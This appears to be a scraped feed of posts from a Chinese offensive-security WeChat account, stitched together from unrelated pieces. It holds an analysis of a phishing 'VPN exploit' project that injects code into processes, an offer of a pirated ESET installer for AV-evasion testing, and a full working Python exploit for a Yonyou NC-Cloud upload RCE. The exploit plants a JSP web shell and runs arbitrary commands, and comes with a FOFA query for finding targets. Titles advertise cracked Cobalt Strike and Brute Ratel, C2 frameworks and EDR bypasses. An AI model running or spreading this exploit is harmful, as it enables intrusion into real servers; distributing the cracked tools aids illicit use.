兄弟文章我先发了，如果分析有误，我千字文给你道歉。

正文开始

项目结构

拆包后内容

全局搜索存在两个入口类，看名称先从pwd.class看起

代码不长，通篇大量混淆后字符串，和前几天分析哥斯拉插件钓鱼异曲同工。

使用ALLATORIxDEMO解密混淆代码。ALLATORIxDEMO和哥斯拉的也一个叼样

总的来说这段代码是入口类，先对一系列字符串解密并输出，然后解析命令行参数数组，获取特定的参数，并根据参数执行相应参数。

解密之后发现其是项目说明等，继续深扒详细功能。

紧跟sockPwn.pwn

新的解密，一堆赋值，看一眼rand_p是干啥。

这段代码生成了一个最大到11904的随机数。虽然不知道确切是做什么的但是结合上文pwn功能来看是大概率是为Socket开启了一个随机端口。

看回pwn

上述各种赋值包括目前还是密的混淆代码，和疑似开启的随机端口都被赋值给了var5。

先记下来后面慢慢盘。

这段try-catch用于执行一系列网络操作。它通过Socket对象与特定主机和端口建立连接，并发送特定的字符串数据。然后使用线程池执行任务，并最后关闭线程池。

解密混淆后的字符串查看

这段核心实现在253行附近

使用ExecutorService的submit方法，将一个任务提交到线程池。以当前对象为目标，调用方法pwn_type()。

这段代码根据系统属性"e<$!k\"o"的值，判断其是否包含特定的字符串，然后执行相应的操作。如果包含字符串"}&d"，则创建一个pwnAction对象并调用其action()方法。如果包含字符串"g.i"，则创建一个sockPwn对象。

解密看看都代表了什么

钓鱼佬的嘲讽。

跟进pwnAction马上就能看到他最后做了什么

解密后结果

核心看下面这两行

熟悉的defineClass()，这几行实现了反射获取指定类的Class对象，如果类不存在则通过dump()方法获取类的字节码，然后使用defineClass()方法创建一个新的类对象。熟悉的配方，熟悉的味道啊。看一眼dump

解密后对照表

修改后代码成这样，使用字节码生成了一个类。具体太乱了回到上面看到了findAttachDllPath

解密后

这段代码的目的是搜索系统中的attach.dll文件。

结合所有已知信息分析。这段代码是一个用于攻击的 Java 类，在运行时加载自身，如目标是win就执行其中的action()方法。该方法会从系统中查找attach.dll并设置其为java.library.path，然后使用 ClassLoader 动态加载 sun.tools.attach.WindowsVirtualMachine 类，并通过调用 openProcess 方法打开一个进程，然后调用 enqueue 方法往该进程中注入一个模块，最终达到控制目标进程的结果。

具体攻击详情存在于dll中，由于本人并不会dll的分析所以只能明早交给兄弟来。大概分析至此可以实锤，本项目为钓鱼项目无疑。

唯一涉及溢出利用bin文件，实际并未调用

恶意dll明早交与大佬分析，具体结果会实时修改文章反馈。

自学java出身，依托答辩，如有分析不对地方希望海涵，欢迎大佬指出错误。

阅读原文

跳转微信打开

领哨兵安装包！！转发朋友圈，群聊凭截图来拿

Tue, 15 Aug 2023 16:05:00 +0800

41group 2023-08-15 16:05 安徽

刚刚嫖到新鲜哨兵eset安装包，现在分享给大家，想测免杀朋友可以踊跃来拿。转发朋友圈或群聊，凭截图来取！！！

刚刚嫖到新鲜哨兵eset安装包，现在分享给大家，想测免杀朋友可以踊跃来拿。

转发朋友圈或群聊，凭截图来取！！！！！

哨兵是啥？？看度娘

安装效果

另：安装需要token，转发后私聊领取

欢迎各位大佬入群交流，需要各种资料也可入群领取。

二维码失效加好友进群！！！！！！！！！！！

群满请加wx入群！！！！！！！

wx：Mathearsion

阅读原文

跳转微信打开

用友0day武器化脚本自取

Sat, 12 Aug 2023 18:36:00 +0800

原创 41group 2023-08-12 18:36 安徽

gh开始到一个小高潮了，每天0day爆出无数，既然发现这个也被爆了那就直接把武器化脚本丢给大家，祝各位打出自

gh开始到一个小高潮了，每天0day爆出无数，既然发现这个也被爆了那就直接把武器化脚本丢给大家，祝各位打出自己满意的成绩！！为国家网络安全提升做出贡献！！！

免责声明：本工具只为学习使用，切勿用户非法途径。一切因本工具或此漏洞产生的后果，利用者自己承担，与本公众号任何人无关！！！！

用友nc-Cloud upload rce

fofa=app="用友-NC-Cloud"


import requestsimport re
def cmd(url, command):    url = url + "/404.jsp?error=bsh.Interpreter"    headers = {"Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"}    data = {"cmd": "org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec(\"" + command + "\").getInputStream())"}    r = requests.post(url, headers=headers, data=data)    print(re.findall(r'(.*?)', r.text, re.S)[0])
def upload(url):    url = url + "/uapjs/jsinvoke/?action=invoke"    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Content-Type": "application/x-www-form-urlencoded", "Accept-Encoding": "gzip"}    json={"methodName": "saveXStreamConfig", "parameters": ["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}", "webapps/nc_web/404.jsp"], "parameterTypes": ["java.lang.Object", "java.lang.String"], "serviceName": "nc.itf.iufo.IBaseSPService"}    r = requests.post(url, headers=headers, json=json)    if r.status_code == 200:        print("上传成功")    else:        print("上传失败")
def main():    url = input("请输入url：")    upload(url)    while True:        command = input("请输入命令(quit退出) > ")        if command == "quit":            break        cmd(url, command)
if __name__ == '__main__':    main()

请勿用于非法用途！！！！后果自负

41全体祝大家工作顺利！！！！！

欢迎各位大佬入群交流，需要各种资料也可入群领取。

二维码失效加好友进群！！！！！！！！！！！

群满请加wx入群！！！！！！！

wx：Mathearsion

阅读原文

跳转微信打开

41group

利用360驱动阻断EDR网络连接

MiaoMeow:一个萌芽阶段的Linux远程管理工具

免责声明

重金求才

重金求才

CobaltStrike Beacon C++ 源码开源分享

一鲸落，万物生

🧭 为什么开源？

🔍 项目亮点

🔧 使用前准备

🎯 我的初衷

📢 特别声明

GateSentinel：为实战而生的现代化 C2 框架（雏形）

🚀 为什么选择 GateSentinel？

🔥 面向实战的设计理念

🛠️ 轻量高效的技术栈

👁️ 面向 HVV/红队使用场景优化

📦 开源即自由，定制无障碍

⚠️ 合规声明

🧠 与其等待别人打造利器，不如亲自掌握主动权。

brute ratel c4 1.7.4泄露

浅浅分析银狐最新断网手法

排版心累移步 https://www.notion.so/209c6252b11b802fa69bdde1c05ac01b?source=copy_link 本来打算起名 揭秘数字安全产品断网机制：从 SetTcpEntry 到 NsiSetAllParameters 感觉太装了算了还是低调一点的好。

41大事件！BRC4破解版/41内部edr&xdr靶场对外开放

java内存马详解

filter

反序列化详解

反序列化作为新生代比较亮点的漏洞，利用难度和理解难度相对来说在sql注入，越权这种常见漏洞相比还是比较困难的。网上文章呢对小白可能不是很好理解，今天这篇文章本人就尽量使用浅显易懂的方式给大家讲解一下。

URLDNS

cc5

手把手带二开哥斯拉（1）

shellentity

c2channel

探究Wallet Drainers使用Create2 Bypass钱包安全告警

1前言

2Create和Create2

Create

Create2

3Bypass Wallet Warning

bypass流程

相关事件

攻击链

攻击者合约

参考

4关于圈子

F5 BIG-IP 远程代码执行漏洞(CVE-2023-46747)（EXP效果）

cs4.9最新版已破解自领

重磅消息Cobalt Strike 4.9官方最新版

SnakeYaml反序列化漏洞

Bypass360核晶_致盲edr

奇某信VPN溢出钓鱼项目分析

领哨兵安装包！！转发朋友圈，群聊凭截图来拿

用友0day武器化脚本自取

排版心累移步 https://www.notion.so/209c6252b11b802fa69bdde1c05ac01b?source=copy_link 本来打算起名揭秘数字安全产品断网机制：从 SetTcpEntry 到 NsiSetAllParameters 感觉太装了算了还是低调一点的好。